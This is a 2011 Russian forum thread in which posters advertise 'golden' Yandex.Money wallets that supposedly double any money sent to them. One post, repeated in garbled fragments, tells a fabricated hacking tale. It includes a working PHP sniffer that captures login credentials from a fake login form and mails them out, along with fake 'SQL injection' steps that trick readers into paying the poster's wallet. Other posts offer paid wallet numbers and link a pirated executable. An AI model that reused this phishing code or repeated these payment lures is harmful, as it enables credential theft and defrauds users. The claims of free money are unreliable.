PickPickPick Пятница, 01.11.2024, 02:14
Приветствую Вас Гость | RSS
MOTOROLA
Главная | Яндекс деньги на халяву - Страница 2 - Форум | Регистрация | Вход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Яндекс деньги на халяву
анонимДата: Понедельник, 24.01.2011, 02:52 | Сообщение # 16
Рядовой
Статус: Offline
Нашёл НОвого бота кидаете сюда 41001853841142 100 руб возврашаеться 200 больше 300 не кидайте заберёт smile

mollaДата: Вторник, 25.01.2011, 19:56 | Сообщение # 17
Рядовой
Да!!! Система работает, я лично пробовал вот с этим кошельком 41001802464162 и возвращает с 20% добавкой к положенной сумме. Прикольная система положил - получил. Пробовал по 100р, но думаю прокатит с любыми суммами . Удачи !!

InstruktorДата: Четверг, 27.01.2011, 10:35 | Сообщение # 18
Рядовой
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 100 руб на этот номер кошелька 41001794978793
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

"Как выполнить взлом яндекс денег на своем компе"

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

6 Переводим на этот счет 41001794978793 где мы сделали баг

7. Где сообщение получателю пишем вот это:

[color=gray]SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001794978793»

8. В название платежа пишем это:
cc.content_id

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам, Проверена это уже на многих компах так что дерзайте.

Добавлено (27.01.2011, 10:33)
---------------------------------------------
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
}
email($adminmail,$text);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 100 руб на этот номер кошелька 41001794978793
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

[color=gray]SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''

Вот пример :
id = «41001794978793»

cc.content_id

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам, Проверена это уже на многих компах так что дерзайте.

Добавлено (27.01.2011, 10:35)
<?
}
email($adminmail,$text);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

</FORM>";
?>
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 100 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 100 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 100 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 100 рублей

Вот пример :
id = «41001794978793»

cc.content_id

илюхаДата: Четверг, 27.01.2011, 21:07 | Сообщение # 19
Рядовой
здравствуйте дорогие любители халявы. сижу я здесь читаю сообщения и думаю на каких дураков это рассчитано. ну скажите мне какой дурак вам просто так отдаст номер реального золотого кошелька? разве вы думаете что это выгодно? все это друзья мои лохотрон, а так называемые номера золотых кошельков это ни что иное, как номера кошельков тех, кто пишет про золотые кошельки. я предлагаю вам номер реально действующего кошелька. разумеется не просто так. за все в этом мире приходится платить. так вот этот кошелек платит безотказно, но всего 10% от внесенной на него суммы. но посудите сами если вы кладете туда 1000 рублей, то к вам приходит 1100! заманчиво не правда ли? если вас заинтересовало данное предложение пишите мне ilya.kucherov@yandex.ru. о цене договоримся. и помните НИКТО не даст вам просто так номер реально платящего кошелька!!!

MEGAMENДата: Вторник, 01.02.2011, 23:02 | Сообщение # 20
Рядовой
раздача денег: 41001458026084
20 рублей = 40 !
Больше нечего говорить! Если хотите можете верить остальным лохотронщикам !
Можно класть и меньшую сумму ! cool

настяДата: Среда, 02.02.2011, 01:55 | Сообщение # 21
Рядовой
Вот вам реальный кошелек 41001581200791 в сообщении пишите 317-410,можно класть даже 1руб.вернутся +10%,пробуйте,от рубля не обиднеете зато убедитесь,что это правда!

ФортунаДата: Среда, 02.02.2011, 08:11 | Сообщение # 22
Рядовой
Не верил до последнего, пока не убедился сам, что есть яндекс-кошельки халявные, отправляю любую сумму до 100 рублей и возвращается на 10% больше. риск благородное дело друзья, вот он родной 4100 184 968 1966 Желаю всем халявы- Ура!!!

КИРИКДата: Пятница, 04.02.2011, 16:01 | Сообщение # 23
Рядовой
Вот номер золотого яндекс кошелька 41001843348984 он рабочий проверено 100 %.И так на него нужно отправить 300 рублей и подождать 10 15 минут и риходит уже не 300 рублей,а целых 600 рублей Решать вам богатеть вам или нет ?

кэтДата: Вторник, 08.02.2011, 18:25 | Сообщение # 24
Рядовой
http://soldowskaya.narod2.yandex.ru/edit/ вот читайте, здесь реально можно заработать деньги без всякого лохотрона, проверено на себе biggrin biggrin biggrin biggrin biggrin

ReSpEcT[64]Дата: Среда, 09.02.2011, 16:51 | Сообщение # 25
Рядовой
Я нашел нуба который на 50% больше присылает сумму которую вы ему отослали вот номер 41001822070859 только надо присылать не меньше 50 руб не больше 400руб.

Добавлено (09.02.2011, 16:50)
присылайте не пожалеете

Добавлено (09.02.2011, 16:51)
проверено на себе

BondДата: Пятница, 11.02.2011, 20:00 | Сообщение # 26
Рядовой
Народ мне знакомый рассказал про один кошелек, туда надо кинуть 10р, а через минут 30 - 40 приходит 20р, пробовали ложить 50р пришло 85, больше не пробовали ложить, кстати, а вот и сам кошелек 41001877232261! ВАЖНО в сообщении получателю напишите step[i] timer=setTimeout("showrings()",764)function hiderings(e){if (document.all) { clearTimeout(timer) startfontsize=5 for (i=8;i<=ringnumber;i++) { thisring=eval("document.all.ring"<b>".style"=seeds_cyr_medium" thisring.visibility="hidden" cool

GAPSONДата: Понедельник, 21.02.2011, 19:57 | Сообщение # 27
Рядовой
Яндекс деньги на халяву!!!
Я хочу рассказать вам как люди обманывают людей и как можно прекратить это, а главное обмануть самих кидал! Прочитайте до конца! У вас это займёт буквально минуту!
Нашёл я в сети где-то статью приблизительно такого содержания: Есть в системе волшебный кошелек, и все что вы на него пошлете вернется вам в удвоенном размере!!! Любая сумма от 20руб и выше! Пошлете 20 руб получите 40 руб,Пошлете 100 руб получите 200 руб и т.д. Конечно, всем понятно, лохотрон, но если порыть глубже…
Я не поверил, но для теста послал 20 руб. Через где-то 1 час проверил свой кошелек и обнаружил пополнение счета на 40 руб ! Я удивился.
Послал потом еще 20 руб опять то же самое. Потом послал 100 руб, мне пришло 200 руб. Осмелев окончательно послал все что у меня было – около 1000 руб... Что было дальше, думаю, вы уже поняли.. Никаких 2000 руб мне никто не прислал, да и моя 1000 тоже исчезла навсегда...

Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 20 руб и примерно до 800 руб (закидывал им 900 руб и их забрали, а 850 закинул программа вернула 1700 руб) Вот и заколачивают тысячи!

В общем, это я к тому, что если быть аккуратными и высылать, небольшую сумму (они принимают любые суммы, но не меньше 20 руб), то всегда можно получать в два раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть.

Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 20 руб вы в любом случае получите 40руб, т.к. сумма мелкая и они будут ждать пока вы пришлете больше.

Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана.

Я сейчас зарабатываю на этом около 12000 руб (можно делать и больше).
Это не миллионы, но это более-менее стабильный доход. Оплачиваю интернет и прочие мелочи....

Денег на этих кошельках десятки (а может и сотни) тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить.

Просто заведите себе почту на yandex. ru, активируйте кошелёк и шлите с него на этот кошелек.

Вот сам кошелёк:

41001715100150

Совет: Если на первом этапе у Вас совсем нет денег, то можете переводить сумму 20руб до тех пор пока не раскачаетесь.

Повторяю! Ставку поднимать не стоит, т.к. если ставка выше 800 руб то программа их забирает,даже и не пробуйте, и на суммы меньше 20 руб. она тоже не пришлёт вам ни чего... Короче кидаем от 20руб. до 800 руб.И вместе мы разорим этих наглых лохотронщиков.
Вас не застовляют это делать... просто вы можете разорить лохотрон.Удачи!!

ReSpEcT[64]Дата: Суббота, 26.02.2011, 08:17 | Сообщение # 28
Рядовой
я нашел один номер яндек денег ложишь туда не больше 20 руб приходит 60 руб но не ложите меньше 10 руб могут и не вернуть вот номер кошелька 41001822070859 cool cool cool

TrAnEДата: Суббота, 26.02.2011, 13:24 | Сообщение # 29
Рядовой
©Люди прива ! Я сёдня лазил по нету и надыбал кошёк (вот он 41001856803554)и написано что он типа золотой кинешь 50 придёт в 5 раз больш,как всегда подумал что это лохотрон.И ради прикола кинул 10р и продолжил лазить .Через 30 мин захожу на яндекс и смотрю даланс 50р я охринел .Перезашёл ещё раз всё ровно 50р.Если кто не верит проверьте но больше 100 р за раз не кидайте придёт 98 р.номер кошеля 41001856803554!

VANO19979Дата: Четверг, 03.03.2011, 10:53 | Сообщение # 30
Рядовой
Люди недавно наткнулся на один сайт и нашёл супер платформер вы не ослышались "СУПЕР ПЛАТФОРМЕР" вот сылка на него
http://uploading.com/files/6mc896e4/Super.Meat.Boy.2010.RU.PC.exe/ игра называется Super meat boy он абсалютно бесплатный и не требует регистрации качайте не пожалеете.Игра про то как истекающая кровью тефтель спасает свою возлюбленную пластыревую девушку от злого врага фетуса тоись (зародыша) игра нопоминает игру super mario тем что там более 300 уровней.Да вы не ослышались "300 уровней" в чём соль этой игры отвечаю можно убить много времени на прохождение уровней каждый уровень напичкан ловушками и преградами и ещё плюсы за прохождение главы и в начале её можно увидеть угарный мульт и последним она порадует хорошими саунд треками ещё раз напоминаю вот сылка на скачивание этой замечательной игрушки http://uploading.com/files/6mc896e4/Super.Meat.Boy.2010.RU.PC.exe/ спасибо всем за внимание.

Поиск:

Copyright MyCorp © 2024Конструктор сайтов - uCoz